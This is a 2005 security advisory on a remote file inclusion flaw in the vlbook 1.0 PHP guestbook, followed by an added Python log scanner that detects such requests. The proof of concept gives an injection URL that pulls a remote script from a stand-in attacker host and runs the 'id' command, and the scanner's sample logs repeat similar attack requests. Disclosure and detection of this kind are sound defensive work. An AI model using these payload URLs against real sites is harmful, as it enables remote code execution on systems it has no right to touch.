vlbook guestbook version 1.0 is susceptible to a remote file inclusion vulnerability.
4dc0e691d445ccd48ee7105f49de1ab2b22f1db170ebdc3af3ddc7cb3cfec1fe
------------------------------------------------------
Nightmare TeAmZ Advisory 005
------------------------------------------------------
Date - 10/2005
vlbook Remote File Inclusion
AFFECTED PRODUCTS
=================
vlbook 1.0 Guestbook
https://vlbook.com/
OVERVIEW
========
The vlbook is a free, open source and light-weight guestbook written in PHP
using flat files to store messages and settings. It comes with an install
script for quick and effortless installation.
DETAILS
=======
1. Remote File Inclusion
POC
===
1. Remote File Inclusion
------
Vulnerable Path:
/index.php?user=
Example:
www.[Host].com/[Path]/index.php?user=english&l=1&t=1&a=https://www.[Evil-Site].org/cmd.php?&cmd=id
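Detection sketch (an added example, not part of the original advisory or of vlbook): it scans web server access logs for requests to index.php in which any query parameter value begins with a remote URL. All parameters are checked because the advisory names `user=` as the vulnerable path while its example carries the URL in `a=`. The combined log format, the sample lines, the hosts and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A parameter value that begins with a remote URL has no business reaching an include path.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftp)://", re.I)
# Request target inside a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2005:10:01:44 +0000] '
    '"GET /gb/index.php?user=english&l=1&t=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Oct/2005:10:02:03 +0000] '
    '"GET /gb/index.php?user=english&l=1&t=1&a=https://www.evil.example/cmd.php?&cmd=id HTTP/1.1" 200 731',
    '198.51.100.7 - - [12/Oct/2005:10:02:09 +0000] '
    '"GET /gb/index.php?a=http%3A%2F%2Fevil.example%2Fx.txt HTTP/1.1" 200 640',
    '203.0.113.5 - - [12/Oct/2005:10:03:00 +0000] '
    '"GET /gb/index.php?user=english&ref=see+http://example.org HTTP/1.1" 200 5120',
]

def suspicious_params(request_target, script="index.php"):
    """Return (name, decoded_value) pairs whose value starts with a remote URL."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/" + script):
        return []
    # parse_qsl percent-decodes, so encoded forms such as http%3A%2F%2F are caught too.
    return [(n, v) for n, v in parse_qsl(parts.query, keep_blank_values=True)
            if REMOTE_SCHEME.match(v)]

def scan(lines):
    """Return (line_number, client_ip, parameter, value) for every flagged request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        for name, value in suspicious_params(m.group(1)):
            findings.append((lineno, client, name, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("line %d client %s param %s=%s" % finding)
```

A 200 response to a flagged request is worth correlating with outbound connections from the web server to the host named in the parameter value.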
Credits
=======
This vulnerability was discovered and researched by
BiPi_HaCk, Advisory by Sub_Z3r0 of Nightmare TeAmZ,
Site: https://www.NightmareTeAmZ.altervista.org